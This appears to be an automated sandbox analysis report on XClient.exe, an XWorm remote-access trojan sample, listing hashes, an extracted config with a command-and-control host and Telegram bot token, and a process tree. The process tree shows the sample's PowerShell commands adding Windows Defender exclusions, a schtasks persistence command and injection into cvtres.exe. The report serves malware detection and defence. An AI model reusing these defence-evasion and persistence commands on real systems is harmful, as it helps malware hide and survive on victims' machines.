Analysis
-
max time kernel
143s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
27/01/2025, 18:29
General
-
Target
XClient.exe
-
Size
49KB
-
MD5
9cda258445b322eb90f65b32ba86d86c
-
SHA1
d86a39dcc80db9cef23fc389dbbb6951ed7f908c
-
SHA256
0aca70f4574b4f593ad118de1846cb744eed48473a8fd51759c37e508d44e50f
-
SHA512
f76c77b63b6e881cd6e9a436b5efe5e4a45a8e78126fcc6876ec6855ef2572ba7e9dec7200e32ddca78f232d451305f87729ee5989f3c8ed83cde53d132a1d9a
-
SSDEEP
768:DaT5ryS4lEW64POSn1iQK4kb2UULNwLdVvM6wEO1hEjdoHj:GNrH+EWR5rkbzeNivM6wEO1yaj
Malware Config
Extracted
xworm
sponef159-35748.portmap.host:35748
-
Install_directory
%AppData%
-
install_file
svchost.exe
-
telegram
https://api.telegram.org/bot7508868671:AAG6XIOhz39IrQIUnjub1TKVOVZHfdjpsvM/sendMessage?chat_id=6094400048
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/memory/4792-1-0x0000000000340000-0x0000000000352000-memory.dmp family_xworm behavioral1/files/0x000e000000023b95-134.dat family_xworm -
Xworm family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3920 powershell.exe 1324 powershell.exe 4220 powershell.exe 4796 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation XClient.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk XClient.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk XClient.exe -
Executes dropped EXE 2 IoCs
pid Process 4820 svchost.exe 4860 svchost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" XClient.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4792 set thread context of 3960 4792 XClient.exe 123 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe -
Modifies registry class 39 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" explorer.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616193" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616209" explorer.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags explorer.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" explorer.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Rev = "0" explorer.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656} explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" explorer.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 explorer.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 explorer.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1368 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 5960 explorer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3920 powershell.exe 3920 powershell.exe 1324 powershell.exe 1324 powershell.exe 4220 powershell.exe 4220 powershell.exe 4796 powershell.exe 4796 powershell.exe 2216 msedge.exe 2216 msedge.exe 4952 msedge.exe 4952 msedge.exe 2624 identity_helper.exe 2624 identity_helper.exe 1844 powershell.exe 1844 powershell.exe 1844 powershell.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 2396 msedge.exe 2396 msedge.exe 4452 msedge.exe 4452 msedge.exe 224 identity_helper.exe 224 identity_helper.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 5960 explorer.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs
pid Process 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
description pid Process Token: SeDebugPrivilege 4792 XClient.exe Token: SeDebugPrivilege 3920 powershell.exe Token: SeDebugPrivilege 1324 powershell.exe Token: SeDebugPrivilege 4220 powershell.exe Token: SeDebugPrivilege 4796 powershell.exe Token: SeDebugPrivilege 4792 XClient.exe Token: SeDebugPrivilege 4820 svchost.exe Token: SeDebugPrivilege 1844 powershell.exe Token: SeDebugPrivilege 4860 svchost.exe Token: SeDebugPrivilege 5872 powershell.exe -
Suspicious use of FindShellTrayWindow 26 IoCs
pid Process 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4452 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe 4952 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 5960 explorer.exe 5960 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4792 wrote to memory of 3920 4792 XClient.exe 83 PID 4792 wrote to memory of 3920 4792 XClient.exe 83 PID 4792 wrote to memory of 1324 4792 XClient.exe 85 PID 4792 wrote to memory of 1324 4792 XClient.exe 85 PID 4792 wrote to memory of 4220 4792 XClient.exe 87 PID 4792 wrote to memory of 4220 4792 XClient.exe 87 PID 4792 wrote to memory of 4796 4792 XClient.exe 89 PID 4792 wrote to memory of 4796 4792 XClient.exe 89 PID 4792 wrote to memory of 1368 4792 XClient.exe 91 PID 4792 wrote to memory of 1368 4792 XClient.exe 91 PID 4952 wrote to memory of 3716 4952 msedge.exe 96 PID 4952 wrote to memory of 3716 4952 msedge.exe 96 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 3136 4952 msedge.exe 97 PID 4952 wrote to memory of 2216 4952 msedge.exe 98 PID 4952 wrote to memory of 2216 4952 msedge.exe 98 PID 4952 wrote to memory of 5008 4952 msedge.exe 99 PID 4952 wrote to memory of 5008 4952 msedge.exe 99 PID 4952 wrote to memory of 5008 4952 msedge.exe 99 PID 4952 wrote to memory of 5008 4952 msedge.exe 99 PID 4952 wrote to memory of 5008 4952 msedge.exe 99 PID 4952 wrote to memory of 5008 4952 msedge.exe 99 PID 4952 wrote to memory of 5008 4952 msedge.exe 99 PID 4952 wrote to memory of 5008 4952 msedge.exe 99 PID 4952 wrote to memory of 5008 4952 msedge.exe 99 PID 4952 wrote to memory of 5008 4952 msedge.exe 99 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"1⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4792 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4796
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"2⤵
- Scheduled Task/Job: Scheduled Task
PID:1368
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 193.161.193.99 35748 1999 21F55005142CFD0E53C22⤵
- System Location Discovery: System Language Discovery
PID:3960 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1844 -
C:\Windows\SysWOW64\explorer.exe"C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text4⤵
- System Location Discovery: System Language Discovery
PID:5784
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data"3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:4452 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff827cb46f8,0x7ff827cb4708,0x7ff827cb47184⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,3786625054005559732,17595823739856495314,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2092 /prefetch:24⤵PID:5680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,3786625054005559732,17595823739856495314,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2124 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:2396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,3786625054005559732,17595823739856495314,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2876 /prefetch:84⤵PID:4680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3786625054005559732,17595823739856495314,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:14⤵PID:2340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3786625054005559732,17595823739856495314,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:14⤵PID:5096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3786625054005559732,17595823739856495314,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4320 /prefetch:14⤵PID:5520
-
-
